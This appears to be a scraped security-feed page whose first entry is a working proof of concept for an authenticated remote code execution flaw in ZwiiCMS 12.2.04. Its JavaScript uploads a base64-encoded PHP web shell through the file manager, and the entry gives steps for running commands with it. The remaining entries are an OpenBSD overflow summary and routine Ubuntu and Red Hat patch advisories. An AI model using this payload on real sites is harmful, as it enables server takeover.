ZwiiCMS version 12.2.04 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated) # Date: 03/06/2023# Exploit Author: Hadi Mene# Vendor Homepage: https://zwiicms.fr/# Version: 12.2.04 and potentially lower versions # CVE: CVE-2020-10567# Category: webappsZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible foran authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution due to a lack of extension check on the uploaded file.Original CVE author : hackoclipsehttps://github.com/trippo/ResponsiveFilemanager/issues/600Vulnerable code (ajax_calls.php) :// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without beingnecessarily an image81  case 'save_img':82      $info = pathinfo($_POST['name']);83  $image_data = $_POST['url'];8485  if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {86       $image_data = substr($image_data, strpos($image_data, ',') + 1);87       $type = strtolower($type[1]); // jpg, png, gif8889       $image_data = base64_decode($image_data);PoC:1) Login in the Administration Panel. 2) Click on the Folder icon on the top of the panel.3) Open the Developer Tools for that page.4) Copy,Edit and Execute the Javascript Code below .5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMANDJavascript Code######  function submitRequest()      {        var xhr = new XMLHttpRequest();        xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);        xhr.setRequestHeader("Accept", "*\/*");        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");        xhr.withCredentials = true;        var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";        var aBody = new Uint8Array(body.length);        for (var i = 0; i < aBody.length; i++)          aBody[i] = body.charCodeAt(i);         xhr.send(new Blob([aBody]));      }submitRequest();######

ZwiiCMS 12.2.04 Remote Code Execution

OpenBSD version 7.2 suffers from an overflow vulnerability. ip_dooptions() will allow IPOPT_SSRR with optlen = 2. save_rte() will set isr_nhops to very large value, which will cause an overflow in the next ip_srcroute() call.

OpenBSD 7.2 ip_srcroute() Overflow

Ubuntu Security Notice 5931-1 - It was discovered that Python incorrectly handled certain inputs. If a user or an automated system were tricked into running a specially crafted input, a remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5931-1March 07, 2023python3.8 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Python.Software Description:- python3.8: An interactive high-level object-oriented languageDetails:It was discovered that Python incorrectly handled certain inputs. If auser or an automated system were tricked into running a speciallycrafted input, a remote attacker could possibly use this issue to executearbitrary code. (CVE-2022-37454)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   python3.8                       3.8.0-3ubuntu1~18.04.2+esm1   python3.8-minimal               3.8.0-3ubuntu1~18.04.2+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5931-1   CVE-2022-37454Package Information: https://launchpad.net/ubuntu/+source/python3.8/3.8.0-3ubuntu1~18.04.2+esm1

Ubuntu Security Notice USN-5931-1

Ubuntu Security Notice 5930-1 - It was discovered that Python incorrectly handled certain inputs. If a user or an automated system were tricked into running a specially crafted input, a remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5930-1March 07, 2023python3.7 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Python.Software Description:- python3.7: An interactive high-level object-oriented languageDetails:It was discovered that Python incorrectly handled certain inputs. If auser or an automated system were tricked into running a speciallycrafted input, a remote attacker could possibly use this issue to executearbitrary code. (CVE-2022-37454)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   python3.7                       3.7.5-2ubuntu1~18.04.2+esm2   python3.7-minimal               3.7.5-2ubuntu1~18.04.2+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5930-1   CVE-2022-37454Package Information: https://launchpad.net/ubuntu/+source/python3.7/3.7.5-2ubuntu1~18.04.2+esm2

Ubuntu Security Notice USN-5930-1

Red Hat Security Advisory 2023-1101-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1101  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server (v. 7):

Source:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.src.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_76_1-debuginfo-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_80_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_81_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_83_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_76_1-debuginfo-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_80_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_81_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_83_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuFdzjgjWX9erEAQjrcxAAiTCE6ZvPRR87Emuo/U+WaIiQ4diaGR/f  
r7VmU1XzneG4oQ8mtgWIMrwdMVXZjyTfxy/uNpHMAqVZsSzHaNscBtFWkYXsDfsK  
tTOpx4jSLPdlzprpGntL55Zp6EKwZ2aWMnu4quG3yCq7m4YnpBC3kf/dui/x8pzq  
57Yfm/m6XrYy8sWxsh+hNROsa7NQR8yVILOjHfx6XEgFu3LumZD6/GMTiA+klYcS  
8Ne7H7QQ10XuAY6iwfLttZUvDBNgzG/kI32B0zdQgH6JuQHoqWdUzkXQYPfH0c75  
HaHJ6PprIr9GJI1GXkgKNrmOU1K7cw7g8Xki/TIul3DemrOKpk3KDRXq0WCo6z8P  
wBlqGbV9MVKZ2uMjp+yV+IOcNXY4g6Iye48jC1+jKyQS5fkHXscKttVQ5NjoPGH9  
0LWN0SF4QGjriUoAVr3VL80baapru4cHX7RjG7lWCZLBhIw2n3QfeafnXoE+ongG  
tCD5/7HFIs7CcaymK1fYP+zbQn/Jr2cfNyRycSPQj5HXJ3z51HQZge14NfTQJQQv  
PzaPPN90lx+eB1f/+8bQ6S8y2qpUEnKoHHvtLw1ivxw/3+HtmcABFmx8bN6dFKgb  
3eVA3IX9yQpkw5oV0K455iHDAXazt8/XKeStRG12vvBuqHDQOwQ79IsNDuObMCX6  
5Xyu1BzYCsI=Z0I6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1101-01

Red Hat Security Advisory 2023-1102-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: rh-mysql80-mysql security update  
Advisory ID:       RHSA-2023:1102-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1102  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-21594 CVE-2022-21599 CVE-2022-21604  
                   CVE-2022-21608 CVE-2022-21611 CVE-2022-21617  
                   CVE-2022-21625 CVE-2022-21632 CVE-2022-21633  
                   CVE-2022-21637 CVE-2022-21640 CVE-2022-39400  
                   CVE-2022-39408 CVE-2022-39410 CVE-2023-21836  
                   CVE-2023-21863 CVE-2023-21864 CVE-2023-21865  
                   CVE-2023-21867 CVE-2023-21868 CVE-2023-21869  
                   CVE-2023-21870 CVE-2023-21871 CVE-2023-21873  
                   CVE-2023-21874 CVE-2023-21875 CVE-2023-21876  
                   CVE-2023-21877 CVE-2023-21878 CVE-2023-21879  
                   CVE-2023-21880 CVE-2023-21881 CVE-2023-21882  
                   CVE-2023-21883 CVE-2023-21887  
====================================================================  
1. Summary:

An update for rh-mysql80-mysql is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

MySQL is a multi-user, multi-threaded SQL database server. It consists of  
the MySQL server daemon, mysqld, and many client programs.

The following packages have been upgraded to a later upstream version:  
rh-mysql80-mysql (8.0.32). (BZ#2142971, BZ#2162319)

Security Fix(es):

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21594)

* mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21599)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21604)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21608)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21611)

* mysql: Server: Connection Handling unspecified vulnerability (CPU Oct  
2022) (CVE-2022-21617)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21625)

* mysql: Server: Security: Privileges unspecified vulnerability (CPU Oct  
2022) (CVE-2022-21632)

* mysql: Server: Replication unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21633)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21637)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21640)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39400)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39408)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39410)

* mysql: Server: DML unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21836)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21863)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21864)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21865)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21867)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21868)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21869)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21870)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21871)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21873)

* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan  
2023) (CVE-2023-21875)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21876)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21877)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21878)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21879)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21880)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21881)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21883)

* mysql: Server: GIS unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21887)

* mysql: Server: Thread Pooling unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21874)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MySQL server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2142861 - CVE-2022-21594 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142863 - CVE-2022-21599 mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2022)  
2142865 - CVE-2022-21604 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142868 - CVE-2022-21608 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142869 - CVE-2022-21611 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142870 - CVE-2022-21617 mysql: Server: Connection Handling unspecified vulnerability (CPU Oct 2022)  
2142871 - CVE-2022-21625 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142872 - CVE-2022-21632 mysql: Server: Security: Privileges unspecified vulnerability (CPU Oct 2022)  
2142873 - CVE-2022-21633 mysql: Server: Replication unspecified vulnerability (CPU Oct 2022)  
2142875 - CVE-2022-21637 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142877 - CVE-2022-21640 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142879 - CVE-2022-39400 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142880 - CVE-2022-39408 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142881 - CVE-2022-39410 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2162268 - CVE-2023-21836 mysql: Server: DML unspecified vulnerability (CPU Jan 2023)  
2162270 - CVE-2023-21863 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162271 - CVE-2023-21864 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162272 - CVE-2023-21865 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162274 - CVE-2023-21867 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162275 - CVE-2023-21868 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162276 - CVE-2023-21869 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162277 - CVE-2023-21870 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162278 - CVE-2023-21871 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162280 - CVE-2023-21873 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162281 - CVE-2023-21874 mysql: Server: Thread Pooling unspecified vulnerability (CPU Jan 2023)  
2162282 - CVE-2023-21875 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2023)  
2162283 - CVE-2023-21876 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162284 - CVE-2023-21877 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162285 - CVE-2023-21878 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162286 - CVE-2023-21879 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162287 - CVE-2023-21880 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162288 - CVE-2023-21881 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162289 - CVE-2023-21882 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162290 - CVE-2023-21883 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162291 - CVE-2023-21887 mysql: Server: GIS unspecified vulnerability (CPU Jan 2023)

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-mysql80-mysql-8.0.32-1.el7.src.rpm

ppc64le:  
rh-mysql80-mysql-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.ppc64le.rpm

s390x:  
rh-mysql80-mysql-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.s390x.rpm

x86_64:  
rh-mysql80-mysql-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-mysql80-mysql-8.0.32-1.el7.src.rpm

x86_64:  
rh-mysql80-mysql-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21594  
https://access.redhat.com/security/cve/CVE-2022-21599  
https://access.redhat.com/security/cve/CVE-2022-21604  
https://access.redhat.com/security/cve/CVE-2022-21608  
https://access.redhat.com/security/cve/CVE-2022-21611  
https://access.redhat.com/security/cve/CVE-2022-21617  
https://access.redhat.com/security/cve/CVE-2022-21625  
https://access.redhat.com/security/cve/CVE-2022-21632  
https://access.redhat.com/security/cve/CVE-2022-21633  
https://access.redhat.com/security/cve/CVE-2022-21637  
https://access.redhat.com/security/cve/CVE-2022-21640  
https://access.redhat.com/security/cve/CVE-2022-39400  
https://access.redhat.com/security/cve/CVE-2022-39408  
https://access.redhat.com/security/cve/CVE-2022-39410  
https://access.redhat.com/security/cve/CVE-2023-21836  
https://access.redhat.com/security/cve/CVE-2023-21863  
https://access.redhat.com/security/cve/CVE-2023-21864  
https://access.redhat.com/security/cve/CVE-2023-21865  
https://access.redhat.com/security/cve/CVE-2023-21867  
https://access.redhat.com/security/cve/CVE-2023-21868  
https://access.redhat.com/security/cve/CVE-2023-21869  
https://access.redhat.com/security/cve/CVE-2023-21870  
https://access.redhat.com/security/cve/CVE-2023-21871  
https://access.redhat.com/security/cve/CVE-2023-21873  
https://access.redhat.com/security/cve/CVE-2023-21874  
https://access.redhat.com/security/cve/CVE-2023-21875  
https://access.redhat.com/security/cve/CVE-2023-21876  
https://access.redhat.com/security/cve/CVE-2023-21877  
https://access.redhat.com/security/cve/CVE-2023-21878  
https://access.redhat.com/security/cve/CVE-2023-21879  
https://access.redhat.com/security/cve/CVE-2023-21880  
https://access.redhat.com/security/cve/CVE-2023-21881  
https://access.redhat.com/security/cve/CVE-2023-21882  
https://access.redhat.com/security/cve/CVE-2023-21883  
https://access.redhat.com/security/cve/CVE-2023-21887  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuG9zjgjWX9erEAQiCZg//RX3U55Hsa1yStZrZLZLP+nt+h0/LlXRj  
4dixNgz2Zvy9rMQ6mTLuxuxcFDLraLUOLKWi8ZDe3iuZfU5bc+wkyrkdnEBMoZW5  
yidR3Qz8hBBU6CD1VB9bTPmxVPsKlnw272h943XbOUH4JtZvRGTf3O8xpuS0WrEL  
ZGq9SJCDv7MQCL5JhAMODdrED/yFlW5I17CWhRoSi1u8nBW7qeO5Kig/sNFpJQtz  
BYegMWTJx/WFQfCRn0nGck0G8WJkQF3j0hCi+FHDSyHIgYG8XZ5sQX/3Nb6YmV0Q  
d9mQY71oI5ix5mFNdgOAl/xpVKqkV4Ea3sebTB2GGq6N61jRBD+VKy6iiZoKI4S4  
rVj9VIcKvO4gY6Fnag1wd9Kt/iZLbMNBPtLmXjhW8D6YSfiBSieS5Y7BYMSCdyTC  
QwkQPFEy+NNaS4JcbIo5mbth7YshGue3HKT2Ci0z4czP8UxPiVd3+XfRnZcWX6J1  
TyN5qSOXot66HoGWKi4lfDMaM3JHvclVZ0xZc2kUA+tdgzlkY/EWJhFBzJQmpTaV  
Gg5JGAkyaMy8kUWEkvcNFJ/+kztHt2XxofxbDZhqKR9DNqHwbkC6lDfB9I3EIPg0  
LjVBxhMI2o5zReVEeYr8onJSdn6GaF2KLpesPzKm3Elrr2c95pyukcwERJDIJjHm  
n0kK9NnNg94:z9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1102-01

Red Hat Security Advisory 2023-1093-01 - The pesign packages provide the pesign utility for signing UEFI binaries as well as other associated tools. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pesign security update  
Advisory ID:       RHSA-2023:1093-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1093  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-3560  
====================================================================  
1. Summary:

An update for pesign is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The pesign packages provide the pesign utility for signing UEFI binaries as  
well as other associated tools.

Security Fix(es):

* pesign: Local privilege escalation on pesign systemd service  
(CVE-2022-3560)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135420 - CVE-2022-3560 pesign: Local privilege escalation on pesign systemd service

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3560  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuBdzjgjWX9erEAQgOHA/7BEHsUb4+utg+YL/EZfFuUqhkHpV3Xk6z  
i14QR6Hy5kepLhwvGvv37A0U5o8x4rfPYQI+w8vzxliWPY/JXQlawK+qVNcia+xb  
1esZBTq7Pn3yfGxbbdA/nW0V0iFdeG/OnTvuyIWZXVe5RpdxMm6y3AB99xY9WM7Z  
l8QyDNfDQeNRQiZbMupF5Ie8vhnwFEmdNE1rbcBxPInqQ9KJqJNBRqPs/y5fiY9J  
IDuV/zHFGLAru9zfo0j1YxOV+vKa9FgUkgQwcqT3m39/L1qCY1j2aE0W8C9PFLcN  
nWu0qO3AChD2qMqTRxUwlag6OU8m99yXeXJD69udM91KBiAT5NwxPFZTwmodNX8p  
